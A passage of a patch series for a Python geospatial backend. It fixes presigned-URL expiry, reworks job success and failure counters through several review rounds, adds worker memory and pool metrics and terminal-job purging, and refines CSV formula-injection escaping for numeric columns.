+    r8): rounding up instead would mint a URL that outlives the credential
+    authorizing it, which is what the constants above now refuse to do.
     """
     import time
 
@@ -1231,10 +1251,20 @@ def _cog_presign_seconds(request: Request) -> int:
     if deadline is None:
         return _COG_PRESIGN_CEILING_SECONDS
     try:
-        remaining = int(float(deadline) - time.time())
+        remaining_exact = float(deadline) - time.time()
     except (TypeError, ValueError):
         return _COG_PRESIGN_CEILING_SECONDS
-    return max(_COG_PRESIGN_FLOOR_SECONDS, min(_COG_PRESIGN_CEILING_SECONDS, remaining))
+
+    # int() truncates toward zero, which is the direction that matters: 1.9
+    # seconds of token left signs a 1-second URL, never a 2-second one. The
+    # signature can only ever expire before the credential does.
+    remaining = int(remaining_exact)
+    if remaining < _COG_PRESIGN_MINIMUM_SECONDS:
+        raise HTTPException(
+            status_code=status.HTTP_401_UNAUTHORIZED,
+            detail="Download token expired",
+        )
+    return min(_COG_PRESIGN_CEILING_SECONDS, remaining)
 
 
 async def _s3_cog_response(

--- a/backend/app/observability/metrics/jobs.py
+++ b/backend/app/observability/metrics/jobs.py
@@ -98,13 +98,18 @@ async def _refresh_job_metrics() -> None:
             elif status == "doing":
                 jobs_active.labels(queue=q).set(count)
                 seen_doing.add(q)
-            elif status == "succeeded":
-                key = (q, "succeeded")
-                prev = _prev_counts.get(key, 0)
-                delta = count - prev
-                if delta > 0:
-                    jobs_completed_total.labels(queue=q).inc(delta)
-                _prev_counts[key] = count
+            # fix(#1778): there is deliberately no `succeeded` branch. The
+            # worker runs with delete_jobs="successful", which makes
+            # procrastinate_finish_job_v1 DELETE the row while it is still
+            # `doing`, so status='succeeded' is never written and this 15s poll
+            # could never observe it. geolens_jobs_completed_total read a flat
+            # zero from the day it was added, and the RUNBOOK entry and the
+            # "Job throughput" Grafana panel read zero with it -- a healthy
+            # ingest burst looked identical to a dead worker. The counter is
+            # now incremented at the terminal transition instead, by the
+            # worker middleware in platform/jobs/worker.py. The `failed`
+            # branch below stays a row count because failed rows are NOT
+            # deleted, which is what the GeoLensJobFailures alert depends on.
             elif status == "failed":
                 key = (q, "failed")
                 prev = _prev_counts.get(key, 0)

--- a/backend/app/observability/metrics/jobs.py
+++ b/backend/app/observability/metrics/jobs.py
@@ -54,11 +54,10 @@ staging_orphans_deleted_total = Counter(
     "Staging objects deleted for having no ingest-job row tracking them",
 )
 
-# Track previous snapshot for counter delta computation.
-# NOTE(#655): on the first cycle after boot this is empty, so the counters seed
-# with the full historical procrastinate_jobs row counts — raw counter values
-# include pre-boot history. increase()/rate() queries are unaffected.
-_prev_counts: dict[tuple[str, str], int] = {}
+# fix(#1778 codex r1): the delta snapshot this module used to keep is gone with
+# the last counter branch that read it. NOTE(#655) recorded that the first cycle
+# after boot seeded the counters with historical row counts; nothing seeds them
+# now, because neither counter is derived from a row count any more.
 
 # Queues whose gauge children have been set at least once — zeroed (not
 # removed) when their todo/doing rows disappear from a cycle. fix(#655)
@@ -68,8 +67,9 @@ _known_queues: set[str] = set()
 async def _refresh_job_metrics() -> None:
     """Run one metrics collection cycle (no loop, no sleep).
 
-    Queries procrastinate_jobs for status counts grouped by queue,
-    updates gauges directly and increments counters by delta.
+    Queries procrastinate_jobs for status counts grouped by queue and updates
+    the two gauges. fix(#1778 codex r1): gauges only. Both counters are
+    incremented at the terminal transition, in platform/jobs/worker.py.
     """
     from app.core.db import engine
 
@@ -105,18 +105,19 @@ async def _refresh_job_metrics() -> None:
             # could never observe it. geolens_jobs_completed_total read a flat
             # zero from the day it was added, and the RUNBOOK entry and the
             # "Job throughput" Grafana panel read zero with it -- a healthy
-            # ingest burst looked identical to a dead worker. The counter is
-            # now incremented at the terminal transition instead, by the
-            # worker middleware in platform/jobs/worker.py. The `failed`
-            # branch below stays a row count because failed rows are NOT
-            # deleted, which is what the GeoLensJobFailures alert depends on.
-            elif status == "failed":
-                key = (q, "failed")
-                prev = _prev_counts.get(key, 0)
-                delta = count - prev
-                if delta > 0:
-                    jobs_failed_total.labels(queue=q).inc(delta)
-                _prev_counts[key] = count
+            # ingest burst looked identical to a dead worker.
+            #
+            # fix(#1778 codex r1): and no `failed` branch either. That one was
+            # a delta against a snapshot of a row count, which stops working
+            # the moment rows can disappear. purge_expired_terminal_jobs ages
+            # terminal rows out, so a queue's failed group shrinks while
+            # _prev_counts held the pre-purge figure, and the next burst
+            # produced a non-positive delta the counter never saw --
+            # GeoLensJobFailures with it.
+            #
+            # Both counters are incremented at the terminal transition now, by
+            # the worker middleware and the stalled-job sweep in
+            # platform/jobs/worker.py, where there is no snapshot to go stale.
 
         # fix(#655): zero gauges for previously seen queues with no todo/doing
         # rows this cycle — they used to freeze at their last non-zero value

--- a/backend/app/observability/metrics/memory.py
+++ b/backend/app/observability/metrics/memory.py
@@ -10,6 +10,13 @@ worker crosses the memory watermark, so runaway growth is diagnosable from
 Reads /proc directly (Linux containers; no psutil dependency). On platforms
 without /proc (macOS dev) the loop idles silently.
 
+fix(#1778): the Procrastinate worker starts this loop too. It hosts GDAL/OGR
+and carries a 4 GB mem_limit against the API's 2 GB precisely because a large
+raster ingest is memory-hungry, so it is the process most likely to reproduce
+#643 -- and it published no gauge and no watermark warning at all. The prose
+below says "api worker" because that is where the finding came from; both
+services run it now.
+
 fix(#1240, #651): the api service runs in prometheus_client multiprocess
 mode, so a scrape reports every live worker's gauge in one response instead
 of whichever single worker answered. The gauge's own `pid` label plus
@@ -31,7 +38,7 @@ logger = structlog.stdlib.get_logger(__name__)
 
 worker_rss_bytes = Gauge(
     "geolens_worker_rss_bytes",
-    "Resident set size of an API worker process",
+    "Resident set size of an API uvicorn worker or the job worker process",
     ["pid"],
     multiprocess_mode="liveall",
 )

--- a/backend/app/platform/jobs/worker.py
+++ b/backend/app/platform/jobs/worker.py
@@ -415,6 +415,10 @@ async def fail_stalled_queue_jobs() -> int:
         await manager.finish_job_by_id_async(
             job_id=job.id, status=Status.FAILED, delete_job=False
         )
+        # fix(#1778 codex r1): the second site that writes a terminal failed
+        # row. The metrics poll used to see it on its next pass; a transition
+        # count has to be told.
+        count_failed_job(job.queue)
         failed += 1
         log.warning(
             "Failed stalled queue job — its worker stopped heartbeating",
@@ -492,8 +496,39 @@ async def recover_stale_jobs() -> None:
             )
 
 
-async def count_completed_job(call_next, context, worker):
-    """Procrastinate worker middleware: count a job that ran to completion.
+def _writes_a_failed_row(exc: BaseException, context, worker) -> bool:
+    """Would Procrastinate record this exception as a terminal ``failed``?
+
+    fix(#1778 codex r1): mirrors ``Worker._process_job``'s own two decisions,
+    and only those.
+
+    * A ``JobAborted`` or a ``CancelledError`` becomes ``aborted``, never
+      ``failed`` -- the row-count branch this replaces did not count those
+      either, and ``GeoLensJobFailures`` should not fire on a graceful
+      shutdown.
+    * Anything else is ``failed`` ONLY when the task's retry strategy declines
+      to retry. A retried attempt goes back to ``todo`` and writes no failed
+      row, so counting it would turn one eventual failure into one per
+      attempt.
+
+    ``get_retry_exception`` is the same call ``_process_job`` makes. Asking it
+    twice is safe because the decision is a function of the exception and the
+    job's attempt count, both fixed by the time the middleware unwinds; only
+    the ``retry_at`` inside a positive decision could differ under a jittering
+    strategy, and nothing here reads it.
+    """
+    from procrastinate import exceptions as procrastinate_exceptions
+
+    if isinstance(exc, (procrastinate_exceptions.JobAborted, asyncio.CancelledError)):
+        return False
+    task = worker.app.tasks.get(context.job.task_name)
+    if task is None:
+        return True
+    return task.get_retry_exception(exception=exc, job=context.job) is None
+
+
+async def count_job_outcome(call_next, context, worker):
+    """Procrastinate worker middleware: count a job at its terminal transition.
 
     fix(#1778): ``geolens_jobs_completed_total`` used to be derived from a
     ``SELECT status, COUNT(*) ... GROUP BY status`` over
@@ -507,15 +542,28 @@ async def count_completed_job(call_next, context, worker):
     ``call_next`` returning normally is exactly Procrastinate's own success
     condition -- ``_process_job`` treats any exception, including a retry or an
     abort, as a non-success -- so a retried job counts once, on the attempt
-    that finally works. A failure still reaches the counter through the
-    ``failed`` row count in observability/metrics/jobs.py, which works because
-    failed rows are not deleted.
+    that finally works.
 
-    Never let a metrics failure fail the job: the increment is after the task
-    result is in hand and is wrapped, so a Prometheus registry problem costs a
-    log line rather than a re-run of a completed ingest.
+    fix(#1778 codex r1): failures are counted here too, and the poll's
+    ``failed`` delta is gone. The delta was snapshot arithmetic over a row
+    count, and ``purge_expired_terminal_jobs`` makes a queue's failed group
+    shrink: ``_prev_counts`` kept the pre-purge figure, so the next burst
+    produced a non-positive delta and ``geolens_jobs_failed_total`` missed it
+    outright, taking ``GeoLensJobFailures`` with it. A count of transitions has
+    no snapshot to go stale. The other site that writes a failed row --
+    ``fail_stalled_queue_jobs``, which fails a job whose worker stopped
+    heartbeating -- increments the same counter for the same reason.
+
+    Never let a metrics failure change a job's outcome: both increments are
+    wrapped, so a Prometheus registry problem costs a log line rather than a
+    re-run of a completed ingest or a swallowed task exception.
     """
-    result = await call_next()
+    try:
+        result = await call_next()
+    except BaseException as exc:
+        if _writes_a_failed_row(exc, context, worker):
+            count_failed_job(context.job.queue)
+        raise
     try:
         from app.observability.metrics.jobs import jobs_completed_total
 
@@ -523,6 +571,20 @@ async def count_completed_job(call_next, context, worker):
     except Exception:  # broad: a metrics failure must never fail a finished job
         log.warning("Failed to count a completed job", exc_info=True)
     return result
+
+
+def count_failed_job(queue: str | None) -> None:
+    """Record one terminal failure on *queue*.
+
+    fix(#1778 codex r1): the single place the failed counter moves, so the
+    middleware and the stalled-job sweep cannot drift apart.
+    """
+    try:
+        from app.observability.metrics.jobs import jobs_failed_total
+
+        jobs_failed_total.labels(queue=queue or "default").inc()
+    except Exception:  # broad: a metrics failure must never change an outcome
+        log.warning("Failed to count a failed job", exc_info=True)
 
 
 # fix(#1778): how often to age out terminal queue rows. Six hours is a long way
@@ -731,11 +793,12 @@ async def main() -> None:
                     listen_notify=not settings.db_use_external_pooler,
                     install_signal_handlers=True,
                     delete_jobs="successful",
-                    # fix(#1778): the only place a completed job is observable
-                    # -- delete_jobs="successful" removes the row (and its
-                    # events, by cascade) before any poll can see it. See
-                    # count_completed_job.
-                    worker_middleware=[count_completed_job],
+                    # fix(#1778): the only place a job outcome is observable
+                    # -- delete_jobs="successful" removes a succeeded row (and
+                    # its events, by cascade) before any poll can see it, and
+                    # fix(#1778 codex r1) the failed count is a transition too
+                    # now that terminal rows are purged. See count_job_outcome.
+                    worker_middleware=[count_job_outcome],
                     shutdown_graceful_timeout=shutdown_timeout,
                     # fix(#624 codex P1): MUST match the sweep's own window.
                     # Procrastinate's Worker.run() prunes workers silent for

--- a/backend/app/platform/jobs/worker.py
+++ b/backend/app/platform/jobs/worker.py
@@ -422,7 +422,14 @@ async def fail_stalled_queue_jobs() -> int:
         # matching the manager wrapper's ordering. This path calls
         # `finish_job_by_id_async` directly and so never passes through that
         # wrapper, which is why the increment is written out here.
-        count_failed_job(job.queue)
+        #
+        # fix(#1778 codex r5): `getattr`, not `job.queue`. count_failed_job
+        # guards the registry call, but the attribute read happened at the call
+        # site and outside that guard, so a job object without the attribute
+        # raised here -- mid-loop, after some rows had already been failed, and
+        # aborting the rest of the sweep. Metrics bookkeeping must never be the
+        # thing that stops a sweep; an unlabelled failure counts as "default".
+        count_failed_job(getattr(job, "queue", None))
         failed += 1
         log.warning(
             "Failed stalled queue job — its worker stopped heartbeating",

--- a/backend/app/platform/jobs/worker.py
+++ b/backend/app/platform/jobs/worker.py
@@ -417,7 +417,11 @@ async def fail_stalled_queue_jobs() -> int:
         )
         # fix(#1778 codex r1): the second site that writes a terminal failed
         # row. The metrics poll used to see it on its next pass; a transition
-        # count has to be told.
+        # count has to be told. fix(#1778 codex r2): after the await, so a
+        # persistence failure raises above this line and counts nothing --
+        # matching the manager wrapper's ordering. This path calls
+        # `finish_job_by_id_async` directly and so never passes through that
+        # wrapper, which is why the increment is written out here.
         count_failed_job(job.queue)
         failed += 1
         log.warning(
@@ -496,39 +500,11 @@ async def recover_stale_jobs() -> None:
             )
 
 
-def _writes_a_failed_row(exc: BaseException, context, worker) -> bool:
-    """Would Procrastinate record this exception as a terminal ``failed``?
-
-    fix(#1778 codex r1): mirrors ``Worker._process_job``'s own two decisions,
-    and only those.
-
-    * A ``JobAborted`` or a ``CancelledError`` becomes ``aborted``, never
-      ``failed`` -- the row-count branch this replaces did not count those
-      either, and ``GeoLensJobFailures`` should not fire on a graceful
-      shutdown.
-    * Anything else is ``failed`` ONLY when the task's retry strategy declines
-      to retry. A retried attempt goes back to ``todo`` and writes no failed
-      row, so counting it would turn one eventual failure into one per
-      attempt.
-
-    ``get_retry_exception`` is the same call ``_process_job`` makes. Asking it
-    twice is safe because the decision is a function of the exception and the
-    job's attempt count, both fixed by the time the middleware unwinds; only
-    the ``retry_at`` inside a positive decision could differ under a jittering
-    strategy, and nothing here reads it.
-    """
-    from procrastinate import exceptions as procrastinate_exceptions
-
-    if isinstance(exc, (procrastinate_exceptions.JobAborted, asyncio.CancelledError)):
-        return False
-    task = worker.app.tasks.get(context.job.task_name)
-    if task is None:
-        return True
-    return task.get_retry_exception(exception=exc, job=context.job) is None
+_OUTCOME_COUNTERS_ATTR = "_geolens_job_outcome_counters_installed"
 
 
-async def count_job_outcome(call_next, context, worker):
-    """Procrastinate worker middleware: count a job at its terminal transition.
+def install_job_outcome_counters(task_app) -> None:
+    """Count a job's outcome once its terminal row is written, not before.
 
     fix(#1778): ``geolens_jobs_completed_total`` used to be derived from a
     ``SELECT status, COUNT(*) ... GROUP BY status`` over
@@ -539,45 +515,87 @@ async def count_job_outcome(call_next, context, worker):
     cascade-deleted with it, so they are not a source either. The only place
     the transition is observable is inside the process that performs it.
 
-    ``call_next`` returning normally is exactly Procrastinate's own success
-    condition -- ``_process_job`` treats any exception, including a retry or an
-    abort, as a non-success -- so a retried job counts once, on the attempt
-    that finally works.
+    fix(#1778 codex r1): ``geolens_jobs_failed_total`` is counted here too, and
+    the poll's ``failed`` delta is gone. That delta was snapshot arithmetic
+    over a row count, and ``purge_expired_terminal_jobs`` makes a queue's
+    failed group shrink, so ``_prev_counts`` kept the pre-purge figure and the
+    next burst produced a non-positive delta the counter never saw --
+    ``GeoLensJobFailures`` with it.
 
-    fix(#1778 codex r1): failures are counted here too, and the poll's
-    ``failed`` delta is gone. The delta was snapshot arithmetic over a row
-    count, and ``purge_expired_terminal_jobs`` makes a queue's failed group
-    shrink: ``_prev_counts`` kept the pre-purge figure, so the next burst
-    produced a non-positive delta and ``geolens_jobs_failed_total`` missed it
-    outright, taking ``GeoLensJobFailures`` with it. A count of transitions has
-    no snapshot to go stale. The other site that writes a failed row --
-    ``fail_stalled_queue_jobs``, which fails a job whose worker stopped
-    heartbeating -- increments the same counter for the same reason.
+    fix(#1778 codex r2): and it hangs off the JOB MANAGER, not off a worker
+    middleware. Procrastinate runs worker middleware inside
+    ``Worker._process_job``'s ``try``, which is before ``_persist_job_status``,
+    so a middleware that counted there reported a completion for a job whose
+    terminal row had not been written and might never be -- and the failure
+    branch had the same ordering. ``_persist_job_status`` reaches the database
+    through ``job_manager.finish_job``, so wrapping that method counts strictly
+    after the row lands, and an exception on the way through leaves both
+    counters untouched.
 
-    Never let a metrics failure change a job's outcome: both increments are
-    wrapped, so a Prometheus registry problem costs a log line rather than a
-    re-run of a completed ingest or a swallowed task exception.
+    Wrapping ``finish_job`` also removes the need to re-derive Procrastinate's
+    own outcome decision. A retry goes through ``retry_job`` instead and never
+    arrives here, so a retried attempt is not a failure; an abort arrives with
+    ``Status.ABORTED`` and is counted as neither. The status is the one
+    Procrastinate computed, not one this module inferred.
+
+    Idempotent via a sentinel on the manager, mirroring the other install
+    helpers, so a re-entrant call cannot stack wrappers and double count.
     """
-    try:
-        result = await call_next()
-    except BaseException as exc:
-        if _writes_a_failed_row(exc, context, worker):
-            count_failed_job(context.job.queue)
-        raise
+    from procrastinate.jobs import Status
+
+    manager = task_app.job_manager
+    # `is True`, not truthiness: the sentinel is one this function sets, and an
+    # object that answers every attribute (a test double, a proxy) would
+    # otherwise report itself already installed and silently count nothing.
+    if getattr(manager, _OUTCOME_COUNTERS_ATTR, False) is True:
+        return
+    original_finish_job = manager.finish_job
+
+    async def _finish_job_and_count(*args, **kwargs):
+        await original_finish_job(*args, **kwargs)
+        # Only after the await: a persistence failure raises above this line
+        # and neither counter moves.
+        try:
+            job = kwargs.get("job") if "job" in kwargs else (args[0] if args else None)
+            status = (
+                kwargs.get("status")
+                if "status" in kwargs
+                else (args[1] if len(args) > 1 else None)
+            )
+            queue = getattr(job, "queue", None)
+            if status == Status.SUCCEEDED:
+                count_completed_job(queue)
+            elif status == Status.FAILED:
+                count_failed_job(queue)
+        except Exception:  # broad: the terminal row is already written
+            # Reading the job or the status must not undo a persisted outcome.
+            # The count_* helpers guard the registry call; this guards
+            # everything before it.
+            log.warning("Failed to count a job outcome", exc_info=True)
+
+    manager.finish_job = _finish_job_and_count
+    setattr(manager, _OUTCOME_COUNTERS_ATTR, True)
+
+
+def count_completed_job(queue: str | None) -> None:
+    """Record one completed job on *queue*.
+
+    Never let a metrics failure change a job's outcome: a Prometheus registry
+    problem costs a log line rather than a re-run of a finished ingest.
+    """
     try:
         from app.observability.metrics.jobs import jobs_completed_total
 
-        jobs_completed_total.labels(queue=context.job.queue or "default").inc()
-    except Exception:  # broad: a metrics failure must never fail a finished job
+        jobs_completed_total.labels(queue=queue or "default").inc()
+    except Exception:  # broad: a metrics failure must never change an outcome
         log.warning("Failed to count a completed job", exc_info=True)
-    return result
 
 
 def count_failed_job(queue: str | None) -> None:
     """Record one terminal failure on *queue*.
 
     fix(#1778 codex r1): the single place the failed counter moves, so the
-    middleware and the stalled-job sweep cannot drift apart.
+    manager wrapper and the stalled-job sweep cannot drift apart.
     """
     try:
         from app.observability.metrics.jobs import jobs_failed_total
@@ -775,6 +793,14 @@ async def main() -> None:
         # worker service can pin WORKER_QUEUES=raster on multi-core hosts.
         queues = [q.strip() for q in settings.worker_queues.split(",") if q.strip()]
         async with task_app.open_async():
+            # fix(#1778): the only place a job outcome is observable --
+            # delete_jobs="successful" removes a succeeded row (and its events,
+            # by cascade) before any poll can see it, and the failed count is a
+            # transition too now that terminal rows are purged. Installed
+            # before the worker starts and after the connector is open, so no
+            # job can finish outside the wrapper. See
+            # install_job_outcome_counters.
+            install_job_outcome_counters(task_app)
             # fix(#624): inside the connector context (it needs an open pool) and
             # before the worker registers itself, so this process's own heartbeat
             # can never be in the window it sweeps. This pass clears rows stranded
@@ -793,12 +819,6 @@ async def main() -> None:
                     listen_notify=not settings.db_use_external_pooler,
                     install_signal_handlers=True,
                     delete_jobs="successful",
-                    # fix(#1778): the only place a job outcome is observable
-                    # -- delete_jobs="successful" removes a succeeded row (and
-                    # its events, by cascade) before any poll can see it, and
-                    # fix(#1778 codex r1) the failed count is a transition too
-                    # now that terminal rows are purged. See count_job_outcome.
-                    worker_middleware=[count_job_outcome],
                     shutdown_graceful_timeout=shutdown_timeout,
                     # fix(#624 codex P1): MUST match the sweep's own window.
                     # Procrastinate's Worker.run() prunes workers silent for

--- a/backend/app/platform/jobs/worker.py
+++ b/backend/app/platform/jobs/worker.py
@@ -525,6 +525,75 @@ async def count_completed_job(call_next, context, worker):
     return result
 
 
+# fix(#1778): how often to age out terminal queue rows. Six hours is a long way
+# under the shortest sensible INGEST_JOBS_RETENTION_DAYS and keeps the delete's
+# cost off the hot path; the window itself is the retention setting, not this.
+TERMINAL_JOB_PURGE_INTERVAL_SECONDS = 6 * 3600
+
+
+async def purge_expired_terminal_jobs() -> None:
+    """Age out failed, cancelled and aborted queue rows and their events.
+
+    fix(#1778): nothing in the repository ever deleted these. Procrastinate's
+    ``delete_old_jobs`` is never called, there is no pg_cron, no CronJob, no
+    scheduled workflow and no periodic Procrastinate task, and
+    ``POST /jobs/cleanup/stale/`` sweeps only the ``ingest_jobs`` MIRROR. So a
+    successful job left nothing behind (``delete_jobs="successful"`` plus the
+    ON DELETE CASCADE on the events fkey) while every failure, cancellation and
+    abort left one job row plus three event rows forever. Meanwhile
+    ``INGEST_JOBS_RETENTION_DAYS`` deleted the mirror row after 30 days, so
+    what remained was also unattributable.
+
+    The clearest sign it was an oversight rather than a decision is inside
+    ``fail_stalled_queue_jobs``: it writes a permanent FAILED row and then,
+    eight lines later, prunes ``procrastinate_workers`` so the heartbeat table
+    "doesn't grow one tombstone per killed worker".
+
+    Keyed to the same ``INGEST_JOBS_RETENTION_DAYS`` the mirror uses, so the
+    queue row and the row that explains it age out together. 0 disables it,
+    matching the mirror sweep.
+
+    One unfiltered call rather than one per queue: the vendored query builds
+    ``SELECT DISTINCT ON (job.id) job.*, event.at FROM procrastinate_jobs job
+    JOIN procrastinate_events event ...`` as an inline view BEFORE applying the
+    status and age predicate, so the join and sort happen whatever the queue
+    filter is -- N per-queue calls would pay for it N times.
+
+    Caller must hold an open connector (``task_app.open_async()``).
+    """
+    from app.processing.ingest.tasks import task_app
+
+    days = settings.ingest_jobs_retention_days
+    if days <= 0:
+        return
+    await task_app.job_manager.delete_old_jobs(
+        nb_hours=days * 24,
+        include_failed=True,
+        include_cancelled=True,
+        include_aborted=True,
+    )
+    log.info("Purged expired terminal queue jobs", retention_days=days)
+
+
+async def _purge_terminal_jobs_safely() -> None:
+    """Run one purge; never let a failure kill the loop or block startup."""
+    try:
+        await purge_expired_terminal_jobs()
+    except Exception:  # broad: best-effort housekeeping, never fatal to the worker
+        log.warning("Terminal queue job purge failed", exc_info=True)
+
+
+async def run_terminal_job_purges() -> None:
+    """Purge terminal queue rows on an interval for the life of the worker.
+
+    Sleeps first, like ``run_stalled_queue_sweeps``: the caller runs the
+    startup pass itself.
+    """
+    while True:
+        await asyncio.sleep(TERMINAL_JOB_PURGE_INTERVAL_SECONDS)
+        await _purge_terminal_jobs_safely()
+
+
 async def run_health_server() -> None:
     """Run the worker health server on port 8001."""
     config = uvicorn.Config(
@@ -650,7 +719,11 @@ async def main() -> None:
             # before this process existed; the loop below owns the ones that go
             # stale while it runs.
             await _sweep_stalled_queue_safely()
+            # fix(#1778): early, before the jobs-by-events join this query
+            # builds has a large table to sort.
+            await _purge_terminal_jobs_safely()
             sweep_task = asyncio.create_task(run_stalled_queue_sweeps())
+            purge_task = asyncio.create_task(run_terminal_job_purges())
             try:
                 await task_app.run_worker_async(
                     queues=queues,
@@ -681,7 +754,8 @@ async def main() -> None:
                 # Cancel inside the connector context — a sweep mid-query when
                 # the pool closes would raise on the way out.
                 sweep_task.cancel()
-                await asyncio.gather(sweep_task, return_exceptions=True)
+                purge_task.cancel()
+                await asyncio.gather(sweep_task, purge_task, return_exceptions=True)
     finally:
         # 7. Clean up background tasks after worker exits
         metrics_task.cancel()

--- a/backend/app/platform/jobs/worker.py
+++ b/backend/app/platform/jobs/worker.py
@@ -492,6 +492,39 @@ async def recover_stale_jobs() -> None:
             )
 
 
+async def count_completed_job(call_next, context, worker):
+    """Procrastinate worker middleware: count a job that ran to completion.
+
+    fix(#1778): ``geolens_jobs_completed_total`` used to be derived from a
+    ``SELECT status, COUNT(*) ... GROUP BY status`` over
+    ``catalog.procrastinate_jobs``. It could never move, because this worker
+    runs with ``delete_jobs="successful"``: ``procrastinate_finish_job_v1``
+    deletes the row while it is still ``doing``, so no ``succeeded`` row is
+    ever written for the poll to see. The events the trigger writes are
+    cascade-deleted with it, so they are not a source either. The only place
+    the transition is observable is inside the process that performs it.
+
+    ``call_next`` returning normally is exactly Procrastinate's own success
+    condition -- ``_process_job`` treats any exception, including a retry or an
+    abort, as a non-success -- so a retried job counts once, on the attempt
+    that finally works. A failure still reaches the counter through the
+    ``failed`` row count in observability/metrics/jobs.py, which works because
+    failed rows are not deleted.
+
+    Never let a metrics failure fail the job: the increment is after the task
+    result is in hand and is wrapped, so a Prometheus registry problem costs a
+    log line rather than a re-run of a completed ingest.
+    """
+    result = await call_next()
+    try:
+        from app.observability.metrics.jobs import jobs_completed_total
+
+        jobs_completed_total.labels(queue=context.job.queue or "default").inc()
+    except Exception:  # broad: a metrics failure must never fail a finished job
+        log.warning("Failed to count a completed job", exc_info=True)
+    return result
+
+
 async def run_health_server() -> None:
     """Run the worker health server on port 8001."""
     config = uvicorn.Config(
@@ -514,6 +547,8 @@ async def main() -> None:
     import app.processing.embeddings.models  # noqa: F401
 
     from app.observability.metrics.jobs import update_job_metrics
+    from app.observability.metrics.memory import update_memory_metrics
+    from app.observability.metrics.pool import update_pool_metrics
     from app.platform.refresh.credentials import renew_credentials_periodically
     from app.processing.ingest.tasks import task_app
 
@@ -578,6 +613,20 @@ async def main() -> None:
     # 5. Start job metrics collector as background task
     metrics_task = asyncio.create_task(update_job_metrics())
 
+    # fix(#1778): the same two collectors the API lifespan starts. This process
+    # is the one that most needs them -- it hosts GDAL/OGR and gets a 4 GB
+    # mem_limit against the API's 2 GB precisely because a large raster ingest
+    # is memory-hungry -- and it had neither. An OOM-killed worker left exactly
+    # the symptom #643 was filed for: nothing in `docker logs`, no gauge, only
+    # dmesg. update_memory_metrics also WARNs on crossing the watermark, so
+    # runaway growth is diagnosable without a Prometheus scrape.
+    #
+    # The worker runs its own engine and pool, so GeoLensDbPoolSaturated
+    # (infra/monitoring/alerts.yml) could never fire for it either. Both loops
+    # are no-ops off Linux and neither needs multiprocess mode.
+    memory_metrics_task = asyncio.create_task(update_memory_metrics())
+    pool_metrics_task = asyncio.create_task(update_pool_metrics())
+
     # fix(#1277 review round 4): the worker hosts credential renewal too. The
     # process whose liveness gates the CLAIM is this one, so renewing here
     # keeps a queued handoff alive exactly while a claim is still possible —
@@ -609,6 +658,11 @@ async def main() -> None:
                     listen_notify=not settings.db_use_external_pooler,
                     install_signal_handlers=True,
                     delete_jobs="successful",
+                    # fix(#1778): the only place a completed job is observable
+                    # -- delete_jobs="successful" removes the row (and its
+                    # events, by cascade) before any poll can see it. See
+                    # count_completed_job.
+                    worker_middleware=[count_completed_job],
                     shutdown_graceful_timeout=shutdown_timeout,
                     # fix(#624 codex P1): MUST match the sweep's own window.
                     # Procrastinate's Worker.run() prunes workers silent for
@@ -631,11 +685,15 @@ async def main() -> None:
     finally:
         # 7. Clean up background tasks after worker exits
         metrics_task.cancel()
+        memory_metrics_task.cancel()
+        pool_metrics_task.cancel()
         credential_renewal_task.cancel()
         health_task.cancel()
         try:
             await asyncio.gather(
                 metrics_task,
+                memory_metrics_task,
+                pool_metrics_task,
                 credential_renewal_task,
                 health_task,
                 return_exceptions=True,

--- a/backend/app/processing/export/ogr.py
+++ b/backend/app/processing/export/ogr.py
@@ -314,7 +314,11 @@ _CSV_FIELD_SIZE_LIMIT = 2**31 - 1
 _CSV_DEADLINE_CHECK_ROWS = 512
 
 
-def _harden_csv_formulas(output_path: str, hard_deadline: float) -> None:
+def _harden_csv_formulas(
+    output_path: str,
+    hard_deadline: float,
+    numeric_columns: frozenset[str] = frozenset(),
+) -> None:
     """Rewrite a just-written CSV with every formula-triggering cell escaped.
 
     Blocking. Call it through ``run_in_thread_draining`` -- fix(#1778 codex
@@ -342,6 +346,16 @@ def _harden_csv_formulas(output_path: str, hard_deadline: float) -> None:
     The reader's field-size limit is raised and never lowered: a WKT geometry
     for a detailed polygon passes csv's 128 KiB default easily, and lowering it
     again would be a process-global change racing any concurrent export.
+
+    fix(#1778 codex r2): ``numeric_columns`` names the columns whose declared
+    SQL type is numeric, and only those get the number exemption. In an
+    ``integer`` or ``double precision`` column ``-12`` is a measurement and the
+    tab would turn it into text for pandas and QGIS as much as for Excel; in a
+    text column the same characters are a string a user typed, and it keeps the
+    tab. The decision is by column type, never by the shape of the value, and
+    the header row is always escaped strictly. A name ogr2ogr did not emit --
+    the geometry column it writes as ``WKT``, or a column the driver renamed --
+    simply does not match, which fails toward escaping.
     """
     if csv.field_size_limit() < _CSV_FIELD_SIZE_LIMIT:
         csv.field_size_limit(_CSV_FIELD_SIZE_LIMIT)
@@ -359,6 +373,7 @@ def _harden_csv_formulas(output_path: str, hard_deadline: float) -> None:
             open(hardened_path, "w", newline="", encoding="utf-8") as dst,
         ):
             writer = csv.writer(dst, lineterminator=terminator)
+            numeric_at: frozenset[int] = frozenset()
             for index, row in enumerate(csv.reader(src)):
                 if (
                     index % _CSV_DEADLINE_CHECK_ROWS == 0
@@ -368,7 +383,22 @@ def _harden_csv_formulas(output_path: str, hard_deadline: float) -> None:
                         "CSV export exceeded the request budget while applying "
                         "spreadsheet-formula hardening"
                     )
-                writer.writerow([escape_csv_formula(cell) for cell in row])
+                if index == 0:
+                    # The header names the columns; escape it strictly and use
+                    # it to place the exemption by position for every row after.
+                    numeric_at = frozenset(
+                        position
+                        for position, name in enumerate(row)
+                        if name in numeric_columns
+                    )
+                    writer.writerow([escape_csv_formula(cell) for cell in row])
+                    continue
+                writer.writerow(
+                    [
+                        escape_csv_formula(cell, allow_numeric=position in numeric_at)
+                        for position, cell in enumerate(row)
+                    ]
+                )
     except BaseException:
         # Never leave a half-rewritten sibling next to the artifact: the export
         # temp dir is swept by age, and a partial file here would outlive the
@@ -391,6 +421,7 @@ async def run_ogr2ogr_export(
     format_key: str = "",
     pmtiles_maxzoom: int | None = None,
     deadline: float | None = None,
+    numeric_columns: frozenset[str] = frozenset(),
 ) -> None:
     """Run ogr2ogr to export a PostGIS table to a file.
 
@@ -411,6 +442,10 @@ async def run_ogr2ogr_export(
             be answered, from the route's entry. Bounds both this subprocess
             and its server-side query. ``None`` for a caller outside a
             request; see ``export_subprocess_timeout_seconds``.
+        numeric_columns: names of the columns whose declared SQL type is
+            numeric, from ``numeric_column_names(column_info)``. CSV only, and
+            only to decide which cells may keep a leading sign unescaped; see
+            ``_harden_csv_formulas``. An empty set escapes every one.
 
     Raises:
         ExportError: If ogr2ogr exits with non-zero code.
